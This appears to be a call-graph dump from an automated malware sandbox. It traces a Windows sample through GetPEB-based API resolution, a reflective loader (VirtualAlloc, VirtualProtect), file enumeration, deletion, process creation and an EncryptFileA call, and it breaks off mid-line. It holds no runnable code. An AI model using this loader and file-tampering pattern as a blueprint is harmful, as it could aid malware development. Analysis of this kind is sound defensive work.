GetPEB 13371->13375 13372->13368 13372->13370 13372->13371 13372->13373 13374 26740f0 GetPEB 13372->13374 13848 2671000 13372->13848 13373->13193 13374->13372 13376 26797ac 13375->13376 13377 26740f0 GetPEB 13376->13377 13377->13373 13391 26712e1 13378->13391 13379 26718a8 13380 2674570 GetPEB 13379->13380 13383 2671800 13380->13383 13381 26735f0 GetPEB 13381->13391 13383->13193 13385 2674610 GetPEB 13385->13391 13387 2674190 GetPEB 13387->13391 13391->13379 13391->13381 13391->13383 13391->13385 13391->13387 13393 26740f0 GetPEB 13391->13393 13396 2674570 GetPEB 13391->13396 13397 2673590 GetPEB 13391->13397 13857 26722c0 13391->13857 13864 2671cf0 13391->13864 13880 2671ec0 13391->13880 13887 2671ff0 13391->13887 13894 2672ca0 13391->13894 13908 26744b0 13391->13908 13914 2671980 13391->13914 13936 26751f0 13391->13936 13941 2675f80 13391->13941 13393->13391 13396->13391 13397->13391 13402 2678810 13398->13402 13399 26788eb CreateFileW 13400 26788b8 13399->13400 13399->13402 13400->13187 13401 2674190 GetPEB 13401->13402 13402->13399 13402->13400 13402->13401 13403 26740f0 GetPEB 13402->13403 13403->13402 13406 26776c0 13404->13406 13405 267785c 13405->13193 13406->13405 13407 2674190 GetPEB 13406->13407 13408 2675320 GetPEB 13406->13408 13409 2674610 GetPEB 13406->13409 13410 26740f0 GetPEB 13406->13410 13407->13406 13408->13406 13409->13406 13410->13406 13418 26773d0 13411->13418 13412 26735f0 GetPEB 13412->13418 13413 2677555 13413->13187 13414 2677479 LoadLibraryW 13414->13418 13415 2677320 GetPEB LoadLibraryW 13415->13418 13416 2674190 GetPEB 13416->13418 13417 26740f0 GetPEB 13417->13418 13418->13412 13418->13413 13418->13414 13418->13415 13418->13416 13418->13417 13423 267b5d0 13419->13423 13420 267b69b 13420->13193 13421 26740f0 GetPEB 13421->13423 13422 2674190 GetPEB 13422->13423 13423->13420 13423->13421 13423->13422 13425 2677579 13424->13425 13430 267758f 13424->13430 13426 2674190 GetPEB 13425->13426 13427 2677583 13426->13427 13428 26740f0 GetPEB 13427->13428 13428->13430 13429 26775b8 13429->13193 13430->13429 13431 2674190 GetPEB 13430->13431 13432 26775ac 13431->13432 13433 26740f0 GetPEB 13432->13433 13433->13429 13435 267347a 13434->13435 13436 267349f 13435->13436 13437 2674190 GetPEB 13435->13437 13439 26734c7 13436->13439 13441 2674190 GetPEB 13436->13441 13438 2673493 13437->13438 13440 26740f0 GetPEB 13438->13440 13439->13193 13440->13436 13442 26734bb 13441->13442 13443 26740f0 GetPEB 13442->13443 13443->13439 13445 26718e2 13444->13445 13446 26718cc 13444->13446 13450 2674190 GetPEB 13445->13450 13454 267190b 13445->13454 13447 2674190 GetPEB 13446->13447 13448 26718d6 13447->13448 13449 26740f0 GetPEB 13448->13449 13449->13445 13451 26718ff 13450->13451 13453 26740f0 GetPEB 13451->13453 13452 267196e 13452->13193 13453->13454 13454->13452 13454->13454 13988 2672680 13454->13988 13457 267195c 13457->13193 13458 2674570 GetPEB 13458->13452 13460 267359d 13459->13460 13463 26735b3 13459->13463 13461 2674190 GetPEB 13460->13461 13462 26735a7 13461->13462 13464 26740f0 GetPEB 13462->13464 13465 26735db 13463->13465 13466 2674190 GetPEB 13463->13466 13464->13463 13465->13193 13467 26735cf 13466->13467 13468 26740f0 GetPEB 13467->13468 13468->13465 13475 2679920 13469->13475 13470 2679946 13470->13193 13471 26735f0 GetPEB 13471->13475 13472 2679b11 13473 26738b0 GetPEB 13472->13473 13474 2679b21 13473->13474 13474->13193 13475->13470 13475->13471 13475->13472 13476 2674190 GetPEB 13475->13476 13477 26740f0 GetPEB 13475->13477 13476->13475 13477->13475 13494 2678a83 13478->13494 13479 2678c30 13480 2678c4f 13479->13480 13483 2674190 GetPEB 13479->13483 13488 2678c82 13480->13488 13490 2674190 GetPEB 13480->13490 13481 2678ba9 13481->13212 13482 26735f0 GetPEB 13482->13494 13485 2678c43 13483->13485 13486 26740f0 GetPEB 13485->13486 13486->13480 13487 26791e0 GetPEB 13487->13494 13488->13212 13489 2674190 GetPEB 13489->13494 13491 2678c76 13490->13491 13492 26740f0 GetPEB 13491->13492 13492->13488 13493 26738b0 GetPEB 13493->13494 13494->13479 13494->13481 13494->13482 13494->13487 13494->13489 13494->13493 13495 26740f0 GetPEB 13494->13495 13995 2677980 13494->13995 13495->13494 13503 26790c0 13496->13503 13497 26735f0 GetPEB 13497->13503 13498 26791a0 13499 2674ec0 2 API calls 13498->13499 13500 26791b0 13499->13500 13500->13219 13501 26790e7 13501->13219 13502 2674190 GetPEB 13502->13503 13503->13497 13503->13498 13503->13501 13503->13502 13504 26740f0 GetPEB 13503->13504 13504->13503 13506 267b6dc 13505->13506 13507 26740f0 GetPEB 13506->13507 13508 267b812 13506->13508 13509 2674190 GetPEB 13506->13509 13507->13506 13508->13191 13509->13506 13511 26738c5 13510->13511 13512 26738db 13510->13512 13513 2674190 GetPEB 13511->13513 13515 267390d 13512->13515 13517 2674190 GetPEB 13512->13517 13514 26738cf 13513->13514 13516 26740f0 GetPEB 13514->13516 13520 2673942 13515->13520 13521 2674190 GetPEB 13515->13521 13516->13512 13518 2673901 13517->13518 13519 26740f0 GetPEB 13518->13519 13519->13515 13524 2674190 GetPEB 13520->13524 13527 267397a 13520->13527 13522 2673936 13521->13522 13523 26740f0 GetPEB 13522->13523 13523->13520 13525 267396e 13524->13525 13526 26740f0 GetPEB 13525->13526 13526->13527 13528 2674190 GetPEB 13527->13528 13529 26739a6 13527->13529 13530 267399a 13528->13530 13531 26739fc 13529->13531 13533 2674190 GetPEB 13529->13533 13532 26740f0 GetPEB 13530->13532 13531->13236 13532->13529 13534 26739f0 13533->13534 13535 26740f0 GetPEB 13534->13535 13535->13531 13537 26735f0 GetPEB 13536->13537 13538 26737f4 13537->13538 13539 2673815 13538->13539 13540 2674190 GetPEB 13538->13540 13543 267384a 13539->13543 13544 2674190 GetPEB 13539->13544 13541 2673809 13540->13541 13542 26740f0 GetPEB 13541->13542 13542->13539 13547 2673872 13543->13547 13548 2674190 GetPEB 13543->13548 13545 267383e 13544->13545 13546 26740f0 GetPEB 13545->13546 13546->13543 13551 26738a3 DeleteFileW 13547->13551 13552 2674190 GetPEB 13547->13552 13549 2673866 13548->13549 13550 26740f0 GetPEB 13549->13550 13550->13547 13551->13233 13553 2673892 13552->13553 13554 26740f0 GetPEB 13553->13554 13555 267389e 13554->13555 13555->13551 13557 2673613 13556->13557 13558 2673638 13557->13558 13559 2674190 GetPEB 13557->13559 13562 2674190 GetPEB 13558->13562 13565 2673660 13558->13565 13560 267362c 13559->13560 13561 26740f0 GetPEB 13560->13561 13561->13558 13563 2673654 13562->13563 13564 26740f0 GetPEB 13563->13564 13564->13565 13565->13236 13567 2677f00 13566->13567 13568 267804c 13567->13568 13569 2678089 13567->13569 13571 2674190 GetPEB 13567->13571 13575 26740f0 GetPEB 13567->13575 13568->13248 13570 26780a9 13569->13570 13572 2674190 GetPEB 13569->13572 13570->13248 13571->13567 13573 267809d 13572->13573 13574 26740f0 GetPEB 13573->13574 13574->13570 13575->13567 13577 26731a0 13576->13577 13578 26731b5 13577->13578 13581 2673a20 13577->13581 13578->13247 13580 26731e0 13580->13247 13586 2673a40 13581->13586 13582 2673ca0 13584 2673cc4 FindClose 13582->13584 13587 2674190 GetPEB 13582->13587 13583 2673bb3 FindNextFileW 13583->13586 13589 2673cc7 13584->13589 13585 2673bf1 13585->13580 13586->13582 13586->13583 13586->13585 13588 2673b6b FindFirstFileW 13586->13588 13593 26735f0 GetPEB 13586->13593 13594 2674190 GetPEB 13586->13594 13595 26740f0 GetPEB 13586->13595 13596 2673a20 GetPEB 13586->13596 13597 2673590 GetPEB 13586->13597 13590 2673cb3 13587->13590 13588->13586 13588->13589 13589->13580 13591 26740f0 GetPEB 13590->13591 13592 2673cbf 13591->13592 13592->13584 13593->13586 13594->13586 13595->13586 13596->13586 13597->13586 13612 26753ac 13598->13612 13599 267570e 13599->13260 13600 26756bc 13601 26756db 13600->13601 13603 2674190 GetPEB 13600->13603 13609 2675708 RtlFreeHeap 13601->13609 13610 2674190 GetPEB 13601->13610 13602 2674190 GetPEB 13602->13612 13606 26756cf 13603->13606 13604 267567a RtlAllocateHeap 13604->13599 13604->13612 13608 26740f0 GetPEB 13606->13608 13607 26740f0 GetPEB 13607->13612 13608->13601 13609->13599 13611 26756f7 13610->13611 13613 26740f0 GetPEB 13611->13613 13612->13599 13612->13600 13612->13602 13612->13604 13612->13607 13615 2674570 13612->13615 13614 2675703 13613->13614 13614->13609 13616 267457d 13615->13616 13621 2674593 13615->13621 13617 2674190 GetPEB 13616->13617 13618 2674587 13617->13618 13619 26740f0 GetPEB 13618->13619 13619->13621 13620 26745bb 13620->13612 13621->13620 13622 2674190 GetPEB 13621->13622 13623 26745af 13622->13623 13624 26740f0 GetPEB 13623->13624 13624->13620 13626 2675866 13625->13626 13631 267587c 13625->13631 13627 2674190 GetPEB 13626->13627 13628 2675870 13627->13628 13630 26740f0 GetPEB 13628->13630 13629 26758d6 13629->13272 13630->13631 13631->13629 13632 2674190 GetPEB 13631->13632 13633 26758ca 13632->13633 13634 26740f0 GetPEB 13633->13634 13634->13629 13636 2673714 13635->13636 13637 2673739 13636->13637 13638 2674190 GetPEB 13636->13638 13641 2674190 GetPEB 13637->13641 13644 2673761 13637->13644 13639 267372d 13638->13639 13640 26740f0 GetPEB 13639->13640 13640->13637 13642 2673755 13641->13642 13643 26740f0 GetPEB 13642->13643 13643->13644 13644->13277 13644->13644 13657 267a477 13645->13657 13647 267a872 13647->13292 13648 267a8a9 13651 267a8c8 13648->13651 13653 2674190 GetPEB 13648->13653 13650 26735f0 GetPEB 13650->13657 13660 2674190 GetPEB 13651->13660 13663 267a8f0 13651->13663 13652 2674570 GetPEB 13652->13657 13656 267a8bc 13653->13656 13655 2674190 GetPEB 13655->13657 13659 26740f0 GetPEB 13656->13659 13657->13647 13657->13648 13657->13650 13657->13652 13657->13655 13661 26740f0 GetPEB 13657->13661 13712 2671140 13657->13712 13721 267b0c0 13657->13721 13731 2674ec0 13657->13731 13753 267b910 13657->13753 13659->13651 13662 267a8e4 13660->13662 13661->13657 13664 26740f0 GetPEB 13662->13664 13663->13292 13664->13663 13668 267af50 13665->13668 13666 267b03e 13666->13292 13667 267b048 13670 2674190 GetPEB 13667->13670 13672 267b067 13667->13672 13668->13666 13668->13667 13669 267b0c0 GetPEB 13668->13669 13671 2674ec0 2 API calls 13668->13671 13673 2674190 GetPEB 13668->13673 13680 26740f0 GetPEB 13668->13680 13669->13668 13674 267b05b 13670->13674 13671->13668 13676 267b08f 13672->13676 13677 2674190 GetPEB 13672->13677 13673->13668 13675 26740f0 GetPEB 13674->13675 13675->13672 13676->13292 13678 267b083 13677->13678 13679 26740f0 GetPEB 13678->13679 13679->13676 13680->13668 13686 267a93f 13681->13686 13682 267aae3 13685 2674190 GetPEB 13682->13685 13690 267ab02 13682->13690 13683 267a981 13683->13292 13687 267aaf6 13685->13687 13686->13682 13686->13683 13688 2674190 GetPEB 13686->13688 13691 26740f0 GetPEB 13686->13691 13771 26746c0 13686->13771 13689 26740f0 GetPEB 13687->13689 13688->13686 13689->13690 13690->13683 13692 2674190 GetPEB 13690->13692 13691->13686 13693 267ab1e 13692->13693 13694 26740f0 GetPEB 13693->13694 13694->13683 13711 267ab65 13695->13711 13696 267aecb 13697 2674190 GetPEB 13696->13697 13702 267aeea 13696->13702 13701 267aede 13697->13701 13698 267ae3d 13698->13292 13700 2674190 GetPEB 13700->13711 13705 26740f0 GetPEB 13701->13705 13702->13698 13706 2674190 GetPEB 13702->13706 13703 2674ec0 2 API calls 13703->13711 13704 267b0c0 GetPEB 13704->13711 13705->13702 13707 267af06 13706->13707 13709 26740f0 GetPEB 13707->13709 13709->13698 13710 26740f0 GetPEB 13710->13711 13711->13696 13711->13698 13711->13700 13711->13703 13711->13704 13711->13710 13796 2674ba0 13711->13796 13805 2674cf0 13711->13805 13718 2671150 13712->13718 13713 267124a 13714 2671242 13713->13714 13715 2674190 GetPEB 13713->13715 13714->13657 13716 267125d 13715->13716 13717 26740f0 GetPEB 13716->13717 13717->13714 13718->13713 13718->13714 13719 2674190 GetPEB 13718->13719 13720 26740f0 GetPEB 13718->13720 13719->13718 13720->13718 13730 267b0dd 13721->13730 13722 26735f0 GetPEB 13722->13730 13723 267b392 13724 267b125 13723->13724 13726 2674190 GetPEB 13723->13726 13724->13657 13725 2674190 GetPEB 13725->13730 13727 267b3a5 13726->13727 13728 26740f0 GetPEB 13727->13728 13728->13724 13729 26740f0 GetPEB 13729->13730 13730->13722 13730->13723 13730->13724 13730->13725 13730->13729 13732 2674ed2 13731->13732 13733 2674ee8 13731->13733 13734 2674190 GetPEB 13732->13734 13736 2674f27 CreateProcessW 13733->13736 13738 2674190 GetPEB 13733->13738 13735 2674edc 13734->13735 13737 26740f0 GetPEB 13735->13737 13739 2674f47 13736->13739 13740 2674fc3 13736->13740 13737->13733 13741 2674f16 13738->13741 13742 2674f4f 13739->13742 13745 2674190 GetPEB 13739->13745 13747 2674f83 13739->13747 13740->13657 13743 26740f0 GetPEB 13741->13743 13742->13657 13744 2674f22 13743->13744 13744->13736 13746 2674f77 13745->13746 13749 26740f0 GetPEB 13746->13749 13748 2674fad 13747->13748 13750 2674190 GetPEB 13747->13750 13748->13657 13749->13747 13751 2674fa1 13750->13751 13752 26740f0 GetPEB 13751->13752 13752->13748 13754 267b923 13753->13754 13755 267b9c0 13754->13755 13756 267b9b2 13754->13756 13761 2674610 13754->13761 13755->13756 13757 2674190 GetPEB 13755->13757 13756->13657 13758 267b9e2 13757->13758 13760 26740f0 GetPEB 13758->13760 13760->13756 13762 267461d 13761->13762 13763 2674633 13761->13763 13764 2674190 GetPEB 13762->13764 13767 2674190 GetPEB 13763->13767 13769 267465b 13763->13769 13765 2674627 13764->13765 13766 26740f0 GetPEB 13765->13766 13766->13763 13768 267464f 13767->13768 13770 26740f0 GetPEB 13768->13770 13769->13754 13770->13769 13772 267485e 13771->13772 13773 26746d4 13771->13773 13772->13686 13773->13772 13774 2674190 GetPEB 13773->13774 13777 2674726 13773->13777 13775 267471a 13774->13775 13776 26740f0 GetPEB 13775->13776 13776->13777 13778 2674190 GetPEB 13777->13778 13782 2674786 13777->13782 13787 2674844 13777->13787 13779 267477a 13778->13779 13780 26740f0 GetPEB 13779->13780 13780->13782 13781 267480a 13791 26748a0 13781->13791 13782->13781 13783 2674190 GetPEB 13782->13783 13785 26740f0 GetPEB 13782->13785 13783->13782 13785->13782 13787->13686 13788 2674190 GetPEB 13789 2674838 13788->13789 13790 26740f0 GetPEB 13789->13790 13790->13787 13792 2674820 13791->13792 13793 26748bb 13791->13793 13792->13787 13792->13788 13793->13792 13794 2674190 GetPEB 13793->13794 13795 26740f0 GetPEB 13793->13795 13794->13793 13795->13793 13804 2674bc0 13796->13804 13797 2674cbe 13798 2674cb6 13797->13798 13799 2674190 GetPEB 13797->13799 13798->13711 13800 2674cd1 13799->13800 13803 26740f0 GetPEB 13800->13803 13801 2674190 GetPEB 13801->13804 13802 26740f0 GetPEB 13802->13804 13803->13798 13804->13797 13804->13798 13804->13801 13804->13802 13813 2674d10 13805->13813 13806 2674e8b 13807 2674e81 13806->13807 13808 2674190 GetPEB 13806->13808 13807->13711 13809 2674e9e 13808->13809 13810 26740f0 GetPEB 13809->13810 13810->13807 13811 26735f0 GetPEB 13811->13813 13812 2674190 GetPEB 13812->13813 13813->13806 13813->13807 13813->13811 13813->13812 13814 26740f0 GetPEB 13813->13814 13814->13813 13821 2675920 13815->13821 13816 2675a14 13817 2674190 GetPEB 13816->13817 13820 2675a0c 13816->13820 13818 2675a27 13817->13818 13819 26740f0 GetPEB 13818->13819 13819->13820 13820->13313 13821->13816 13821->13820 13822 2674190 GetPEB 13821->13822 13823 26740f0 GetPEB 13821->13823 13822->13821 13823->13821 13826 2674ff0 13824->13826 13825 2675107 13827 2674190 GetPEB 13825->13827 13829 26750c2 13825->13829 13826->13825 13828 2674190 GetPEB 13826->13828 13826->13829 13832 26740f0 GetPEB 13826->13832 13830 267511a 13827->13830 13828->13826 13829->13313 13831 26740f0 GetPEB 13830->13831 13831->13829 13832->13826 13834 2674a27 13833->13834 13840 2674a3d 13833->13840 13835 2674190 GetPEB 13834->13835 13836 2674a31 13835->13836 13838 26740f0 GetPEB 13836->13838 13837 2674ab0 13837->13327 13838->13840 13839 2674a71 13844 2674190 GetPEB 13839->13844 13845 2674aa2 13839->13845 13840->13837 13840->13839 13841 2674190 GetPEB 13840->13841 13842 2674a65 13841->13842 13843 26740f0 GetPEB 13842->13843 13843->13839 13846 2674a96 13844->13846 13845->13327 13847 26740f0 GetPEB 13846->13847 13847->13845 13852 2671010 13848->13852 13849 26710fb 13850 26710f3 13849->13850 13853 2674190 GetPEB 13849->13853 13850->13372 13851 2674190 GetPEB 13851->13852 13852->13849 13852->13850 13852->13851 13856 26740f0 GetPEB 13852->13856 13854 267110e 13853->13854 13855 26740f0 GetPEB 13854->13855 13855->13850 13856->13852 13862 26722e5 13857->13862 13858 267265e 13860 2674570 GetPEB 13858->13860 13861 2672653 13858->13861 13859 2674190 GetPEB 13859->13862 13860->13861 13861->13391 13862->13858 13862->13859 13862->13861 13863 26740f0 GetPEB 13862->13863 13863->13862 13865 2671d71 13864->13865 13866 2671d5b 13864->13866 13870 2671dfe 13865->13870 13871 2674190 GetPEB 13865->13871 13867 2674190 GetPEB 13866->13867 13868 2671d65 13867->13868 13869 26740f0 GetPEB 13868->13869 13869->13865 13874 2671e32 13870->13874 13875 2674190 GetPEB 13870->13875 13872 2671df2 13871->13872 13873 26740f0 GetPEB 13872->13873 13873->13870 13878 26751f0 GetPEB 13874->13878 13876 2671e26 13875->13876 13877 26740f0 GetPEB 13876->13877 13877->13874 13879 2671e66 13878->13879 13879->13391 13885 2671ed6 13880->13885 13881 2671eff 13881->13391 13882 2671fd3 13960 2675320 13882->13960 13884 2674190 GetPEB 13884->13885 13885->13881 13885->13882 13885->13884 13886 26740f0 GetPEB 13885->13886 13886->13885 13893 2672008 13887->13893 13888 2672043 13888->13391 13889 26722a2 13889->13888 13892 2674570 GetPEB 13889->13892 13890 2674190 GetPEB 13890->13893 13891 26740f0 GetPEB 13891->13893 13892->13888 13893->13888 13893->13889 13893->13890 13893->13891 13907 2672cd8 13894->13907 13895 2673129 13897 2673148 13895->13897 13898 2674190 GetPEB 13895->13898 13896 2672d6e 13896->13391 13897->13391 13902 267313c 13898->13902 13899 26740f0 GetPEB 13899->13907 13900 26735f0 GetPEB 13900->13907 13903 26740f0 GetPEB 13902->13903 13903->13897 13904 2674190 GetPEB 13904->13907 13905 2674570 GetPEB 13905->13907 13907->13895 13907->13896 13907->13899 13907->13900 13907->13904 13907->13905 13966 2672a40 13907->13966 13979 2675a60 13907->13979 13909 26744d0 13908->13909 13910 26744c2 13908->13910 13909->13391 13911 2674190 GetPEB 13910->13911 13912 26744c7 13911->13912 13913 26740f0 GetPEB 13912->13913 13913->13909 13921 267199f 13914->13921 13915 2671c46 13916 26736f0 GetPEB 13915->13916 13918 2671c50 13916->13918 13917 2671c39 13917->13391 13919 2674190 GetPEB 13918->13919 13923 2671c71 13918->13923 13920 2671c65 13919->13920 13922 26740f0 GetPEB 13920->13922 13921->13915 13921->13917 13928 2674190 GetPEB 13921->13928 13931 2675180 GetPEB 13921->13931 13934 26736f0 GetPEB 13921->13934 13935 26740f0 GetPEB 13921->13935 13922->13923 13924 2674190 GetPEB 13923->13924 13926 2671ca3 13923->13926 13925 2671c97 13924->13925 13929 26740f0 GetPEB 13925->13929 13927 2671ccb 13926->13927 13930 2674190 GetPEB 13926->13930 13927->13391 13928->13921 13929->13926 13932 2671cbf 13930->13932 13931->13921 13933 26740f0 GetPEB 13932->13933 13933->13927 13934->13921 13935->13921 13939 2675206 13936->13939 13937 267528d 13937->13391 13938 2674190 GetPEB 13938->13939 13939->13937 13939->13938 13940 26740f0 GetPEB 13939->13940 13940->13939 13942 2675f90 13941->13942 13943 2675fa6 13941->13943 13944 2674190 GetPEB 13942->13944 13947 2674190 GetPEB 13943->13947 13951 2675fce 13943->13951 13945 2675f9a 13944->13945 13946 26740f0 GetPEB 13945->13946 13946->13943 13948 2675fc2 13947->13948 13949 26740f0 GetPEB 13948->13949 13949->13951 13950 2676052 13950->13391 13951->13950 13952 2674190 GetPEB 13951->13952 13953 2676019 13951->13953 13954 267600d 13952->13954 13956 2676041 13953->13956 13957 2674190 GetPEB 13953->13957 13955 26740f0 GetPEB 13954->13955 13955->13953 13956->13391 13958 2676035 13957->13958 13959 26740f0 GetPEB 13958->13959 13959->13956 13961 2675349 13960->13961 13963 267535f 13960->13963 13962 2674190 GetPEB 13961->13962 13964 2675353 13962->13964 13963->13881 13965 26740f0 GetPEB 13964->13965 13965->13963 13967 2672a60 13966->13967 13968 2672b7a 13967->13968 13969 2674190 GetPEB 13967->13969 13972 26740f0 GetPEB 13967->13972 13970 2672bc7 13968->13970 13971 2672b9f 13968->13971 13973 2674190 GetPEB 13968->13973 13969->13967 13970->13907 13971->13970 13976 2674190 GetPEB 13971->13976 13972->13967 13974 2672b93 13973->13974 13975 26740f0 GetPEB 13974->13975 13975->13971 13977 2672bbb 13976->13977 13978 26740f0 GetPEB 13977->13978 13978->13970 13986 2675a71 13979->13986 13980 2675b69 13981 2675b62 13980->13981 13983 2674190 GetPEB 13980->13983 13981->13907 13982 2674190 GetPEB 13982->13986 13984 2675b7c 13983->13984 13985 26740f0 GetPEB 13984->13985 13985->13981 13986->13980 13986->13981 13986->13982 13987 26740f0 GetPEB 13986->13987 13987->13986 13994 2672690 13988->13994 13989 2671958 13989->13457 13989->13458 13990 2672a15 13991 2674570 GetPEB 13990->13991 13991->13989 13992 2674190 GetPEB 13992->13994 13993 26740f0 GetPEB 13993->13994 13994->13989 13994->13990 13994->13992 13994->13993 14005 2677992 13995->14005 13996 2677af6 13997 2677b15 13996->13997 13999 2674190 GetPEB 13996->13999 13997->13494 13998 26735f0 GetPEB 13998->14005 14001 2677b09 13999->14001 14000 2677a96 14000->13494 14002 26740f0 GetPEB 14001->14002 14002->13997 14003 26740f0 GetPEB 14003->14005 14004 2674190 GetPEB 14004->14005 14005->13996 14005->13998 14005->14000 14005->14003 14005->14004 14006 26731f0 14007 267320a 14006->14007 14008 26733e3 14007->14008 14009 267323d 14007->14009 14010 26733c9 RtlAllocateHeap 14007->14010 14011 2674190 GetPEB 14007->14011 14014 26740f0 GetPEB 14007->14014 14008->14009 14012 2674190 GetPEB 14008->14012 14010->14007 14010->14009 14011->14007 14013 26733f7 14012->14013 14015 26740f0 GetPEB 14013->14015 14014->14007 14015->14009 13001 2210000 13003 2210005 13001->13003 13006 221002d 13003->13006 13026 2210456 GetPEB 13006->13026 13009 2210456 GetPEB 13010 2210053 13009->13010 13011 2210456 GetPEB 13010->13011 13012 2210061 13011->13012 13013 2210456 GetPEB 13012->13013 13014 221006d 13013->13014 13015 2210456 GetPEB 13014->13015 13016 221007b 13015->13016 13017 2210456 GetPEB 13016->13017 13020 2210089 13017->13020 13018 22100e4 GetNativeSystemInfo 13019 2210107 VirtualAlloc 13018->13019 13024 2210029 13018->13024 13022 221012f 13019->13022 13020->13018 13020->13024 13021 22103b2 13028 26127b0 13021->13028 13022->13021 13023 2210388 VirtualProtect 13022->13023 13023->13022 13023->13024 13027 2210045 13026->13027 13027->13009 13031 2611000 13028->13031 13034 2611030 LoadLibraryW GetProcAddress 13031->13034 13075 2611b30 13034->13075 13037 2611091 SetLastError 13070 261102b ExitProcess 13037->13070 13038 26110a3 13039 2611b30 SetLastError 13038->13039 13040 26110b9 13039->13040 13041 26110f0 13040->13041 13042 26110de SetLastError 13040->13042 13040->13070 13043 2611111 13041->13043 13044 26110ff SetLastError 13041->13044 13042->13070 13045 261111c SetLastError 13043->13045 13047 261112e GetNativeSystemInfo 13043->13047 13044->13070 13045->13070 13048 26111bc 13047->13048 13049 26111d7 SetLastError 13048->13049 13050 26111e9 13048->13050 13049->13070 13078 2611800 VirtualAlloc 13050->13078 13051 2611202 13052 261123d GetProcessHeap RtlAllocateHeap 13051->13052 13079 2611800 VirtualAlloc 13051->13079 13053 2611257 SetLastError 13052->13053 13054 261127b 13052->13054 13053->13070 13058 2611b30 SetLastError 13054->13058 13055 2611222 13055->13052 13056 261122e SetLastError 13055->13056 13056->13070 13059 26112fb 13058->13059 13060 2611302 13059->13060 13080 2611800 VirtualAlloc 13059->13080 13106 26116c0 13060->13106 13061 2611320 13081 2611b50 13061->13081 13064 261136b 13064->13060 13087 26121a0 13064->13087 13068 26113ca 13068->13060 13069 26113eb 13068->13069 13069->13070 13071 26113ff GetPEB 13069->13071 13071->13070 13076 2611070 13075->13076 13077 2611b3b SetLastError 13075->13077 13076->13037 13076->13038 13076->13070 13077->13076 13078->13051 13079->13055 13080->13061 13083 2611b7d 13081->13083 13082 2611b30 SetLastError 13084 2611c32 13082->13084 13083->13082 13085 2611be9 13083->13085 13084->13085 13114 2611800 VirtualAlloc 13084->13114 13085->13064 13088 26113b5 13087->13088 13089 26121dd IsBadReadPtr 13087->13089 13088->13060 13100 2611e80 13088->13100 13089->13088 13091 2612207 13089->13091 13091->13088 13092 2612239 SetLastError 13091->13092 13093 261224d 13091->13093 13092->13088 13115 2611a20 13093->13115 13096 2612273 SetLastError 13096->13088 13098 261229d 13098->13088 13099 26123ae SetLastError 13098->13099 13099->13088 13104 2611eba 13100->13104 13101 2611fe5 13102 2611d10 2 API calls 13101->13102 13103 2611fc1 13102->13103 13103->13068 13104->13101 13104->13103 13130 2611d10 13104->13130 13107 26116d2 13106->13107 13108 26116d7 13106->13108 13107->13070 13109 26119d0 VirtualFree 13108->13109 13113 261170b 13109->13113 13111 2611770 GetProcessHeap HeapFree 13111->13107 13112 26119d0 VirtualFree 13112->13111 13113->13111 13113->13112 13114->13085 13116 2611a2c 13115->13116 13119 2611a35 13115->13119 13123 2611900 13116->13123 13120 2611a43 13119->13120 13126 26119f0 VirtualAlloc 13119->13126 13120->13096 13120->13098 13121 2611a51 13121->13120 13127 26119d0 13121->13127 13124 2611910 VirtualQuery 13123->13124 13125 261190c 13123->13125 13124->13125 13125->13119 13126->13121 13128 26119d9 VirtualFree 13127->13128 13129 26119ea 13127->13129 13128->13129 13129->13120 13131 2611d29 13130->13131 13135 2611d1f 13130->13135 13132 2611d37 13131->13132 13133 2611d9d VirtualProtect 13131->13133 13132->13135 13137 2611820 VirtualFree 13132->13137 13133->13135 13135->13104 13137->13135 13138 2674ec0 13139 2674ed2 13138->13139 13140 2674ee8 13138->13140 13160 2674190 GetPEB 13139->13160 13143 2674f27 CreateProcessW 13140->13143 13145 2674190 GetPEB 13140->13145 13146 2674f47 13143->13146 13147 2674fc3 13143->13147 13148 2674f16 13145->13148 13149 2674f4f 13146->13149 13152 2674190 GetPEB 13146->13152 13154 2674f83 13146->13154 13150 26740f0 GetPEB 13148->13150 13151 2674f22 13150->13151 13151->13143 13153 2674f77 13152->13153 13156 26740f0 GetPEB 13153->13156 13155 2674fad 13154->13155 13157 2674190 GetPEB 13154->13157 13156->13154 13158 2674fa1 13157->13158 13159 26740f0 GetPEB 13158->13159 13159->13155 13161 26741b5 13160->13161 13162 26740f0 13161->13162 13163 267414c 13162->13163 13164 267412c 13162->13164 13163->13140 13164->13163 13165 2674190 GetPEB 13164->13165 13168 2674445 13164->13168 13166 2674439 13165->13166 13167 26740f0 GetPEB 13166->13167 13167->13168 13169 2674190 GetPEB 13168->13169 13175 2674476 13168->13175 13170 267446a 13169->13170 13172 26740f0 GetPEB 13170->13172 13171 26740f0 GetPEB 13174 26744a7 13171->13174 13172->13175 13173 2674488 13173->13140 13174->13140 13175->13171 13175->13173 14016 26773c9 14018 26773d0 14016->14018 14017 26735f0 GetPEB 14017->14018 14018->14017 14019 2677555 14018->14019 14020 2677479 LoadLibraryW 14018->14020 14021 2677320 GetPEB LoadLibraryW 14018->14021 14022 2674190 GetPEB 14018->14022 14023 26740f0 GetPEB 14018->14023 14020->14018 14021->14018 14022->14018 14023->14018 14024 2678449 14030 2678442 14024->14030 14025 26786b6 14029 2674190 GetPEB 14025->14029 14036 26786d5 14025->14036 14026 26735f0 GetPEB 14026->14030 14027 2678532 SetFileInformationByHandle 14027->14030 14028 267869f 14032 26786c9 14029->14032 14030->14025 14030->14026 14030->14027 14030->14028 14031 2674190 GetPEB 14030->14031 14033 26784aa CreateFileW 14030->14033 14035 26740f0 GetPEB 14030->14035 14031->14030 14034 26740f0 GetPEB 14032->14034 14033->14030 14033->14036 14034->14036 14035->14030 12963 401600 LoadLibraryA GetProcAddress EncryptFileA 12964 401630 12963->12964 12965 40163f 22 API calls 12963->12965 12966 401878 VirtualAlloc 12965->12966 12967 40185e LdrAccessResource 12965->12967 12993 40100a 12966->12993 12967->12966 12969 4018b6 12996 401019 12969->12996 12971 4018c6 12972 4018e1 LoadIconA LoadCursorA GetStockObject RegisterClassA 12971->12972 12973 4019d3 CreateWindowExA ShowWindow UpdateWindow GetMessageA 12971->12973 12972->12973 12974 40195e 8 API calls 12972->12974 12975 401a3c 12973->12975 12976 401a6d ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N 12973->12976 12977 401a48 TranslateMessage DispatchMessageA GetMessageA 12975->12977 12978 401a96 12976->12978 12979 401a8b 12976->12979 12977->12976 12977->12977 12981 401ac6 12978->12981 12983 401acd ??3@YAXPAX 12978->12983 12979->12978 12980 401a9d ??3@YAXPAX 12979->12980 12980->12978 12982 401af6 12981->12982 12984 401afd ??3@YAXPAX 12981->12984 12985 401b2d ??3@YAXPAX 12982->12985 12987 